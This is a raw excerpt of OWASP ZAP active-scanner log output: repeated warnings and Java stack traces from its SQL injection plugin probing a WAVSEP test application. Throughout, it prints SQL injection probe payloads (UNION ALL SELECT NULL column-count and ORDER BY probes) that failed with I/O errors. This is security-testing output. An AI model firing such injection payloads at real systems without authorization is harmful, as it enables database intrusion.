org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681820 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681821 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681822 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681822 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681823 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681823 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' ORDER BY 5934-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' ORDER BY 5934-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681825 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681825 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681826 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681826 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681827 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681828 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6042-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6042-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681828 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at 